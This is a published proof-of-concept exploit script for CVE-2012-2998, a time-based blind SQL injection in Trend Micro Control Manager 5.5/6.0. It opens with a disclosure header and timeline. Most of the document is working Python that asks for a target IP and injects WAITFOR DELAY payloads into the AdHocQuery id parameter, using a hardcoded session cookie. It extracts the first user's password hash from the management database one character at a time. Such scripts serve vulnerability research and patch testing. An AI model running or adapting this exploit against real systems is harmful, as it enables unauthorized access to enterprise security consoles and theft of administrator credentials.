Trend Micro Control Manager 5.5 / 6.0 Blind SQL Injection

`#!/usr/bin/env python  
  
# Exploit Title: Trend Micro Control Manager 5.5/6.0 AdHocQuery BlindSQL Injection (post-auth)  
# Disclosure Date: 09/27/2012  
# Author: otoy (@otoy_rood) & modpr0be (@modpr0be)  
# Contact: research[at]spentera.com  
# Platform: Windows  
# Tested on: Windows 2003 Standard Edition  
# Software Link: http://www.trendmicro.com/ftp/products/tmcm/CM6_Package.zip  
# References: http://www.spentera.com/2012/09/trend-micro-control-manager-sql-injection-and-xss-vulnerability/  
# CVE-ID: CVE-2012-2998  
  
### Software Description  
# Trend Micro Control Manager is a centralized security management for the enterprise.  
# The web-based management console tracks security performance, reports malware events and  
# policy violations, and automates routine tasks. New features include a customizable dashboard  
# and at-a-glance access to threat statistics from the Trend Micro Smart Protection Network,  
# Trend Micro's cloud-based security infrastructure.  
  
### Vulnerability Details  
# Vulnerability found in AdHocQuery module inside the id parameter. By injecting payload after the  
# id parameter, let say ' WAITFOR DELAY '0:0:5'-- the web application hung for 5 seconds,  
# which gives us a conclusion that the web application is vulnerable to time-based sql injection.  
  
# The script below is just a proof of concept, you must get a cookie. This vulnerability will need some  
# attack vectors to be exploited, but it is still a vulnerability.  
# Remember to set the cookie first.  
  
### Disclosure Timeline  
# 07/23/2012 - Bug found  
# 07/25/2012 - Reported to CERT/CC  
# 07/26/2012 - Reported to JPCERT/CC  
# 08/14/2012 - Vendor received the vulnerability  
# 09/20/2012 - Vendor acknowledged the vulnerability  
# 09/27/2012 - Public advisory released  
  
  
import sys,time,urllib,urllib2  
  
print """  
#===============================================================#  
| |  
| ___| | |  
| \___ \ __ \ _ \ __ \ __| _ \ __| _` | |  
| | | | __/ | | | __/ | ( | |  
| _____/ .__/ \___|_| _|\__|\___|_| \__,_| |  
| _| |  
| |  
| Trend Micro Control Manager BlindSQLi Password Extractor |  
| CVE-2012-2998 |  
| by otoy & modpr0be (research[at]spentera.com) |  
| |  
#===============================================================#  
"""  
host = raw_input("[+] Target IP: ")  
target = 'https://%s/webapp/AdHocQuery/AdHocQuery_Processor.aspx' %(host)  
#SQLi delay, for remote target increase the delay time (default: 2 seconds)  
delay=2  
  
cookie = ("ASP_NET_SessionId=pazibiigfom13ijbaaqxxx55; .ASPXAUTH=582E40E7A78D452B18EF6719DE422CE121E3E7793E2FB661679753C1DCA50D9F7873CFF37BAF54AB3CCD84F5899D930A5D190F2C99552739F1C19FAF80F3EEE444951D0C9B7F6FD707E83BFC02ABD21D; WFINFOR=test")  
  
def Hex2Des(item):  
return ord(hex(item).replace('0x',''))  
  
def konek(m,n):  
#borrow from SQLmap :)  
query=("' IF(UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(Password AS NVARCHAR(4000)),CHAR(32))) FROM db_ControlManager.dbo.tb_UserInfo"  
" WHERE CONVERT(NVARCHAR(4000),Password)>CHAR(32)),%s,1)) > %s) WAITFOR DELAY '0:0:%s'--" %(m,n,delay))  
  
values = { 'Action': 'View',   
'id': '350b651c-15c5-45ca-8d64-33b20f3fc4d8'+query,  
'asc': 'true',  
'Sort': 7,  
'paging': 10 }  
  
url = "%s?%s" % (target, urllib.urlencode(values))  
req = urllib2.Request(url)   
req.add_header('Cookie', cookie)   
try:   
starttime=time.time()  
response = urllib2.urlopen(req)   
endtime = time.time()  
return int(endtime-starttime)  
except:   
print '\n[-] Uh oh! Exploit fail..'   
sys.exit(0)  
  
print "[+] Using Time-Based method with %ds delay."%int(delay)  
print "[+] Starting to extract hash from the first user."  
sys.stdout.write('[+] Here is the hash : ')  
sys.stdout.flush()  
  
starttime = time.time()  
for m in range(1,33):  
for n in range(0,16):  
wkttunggu = konek(m,Hex2Des(n))  
if (wkttunggu < delay):   
sys.stdout.write(chr(Hex2Des(n)))  
sys.stdout.flush()  
break  
endtime = time.time()  
print "\n[+] Done! Hash extracted in %d seconds" %int(endtime-starttime)  
  
`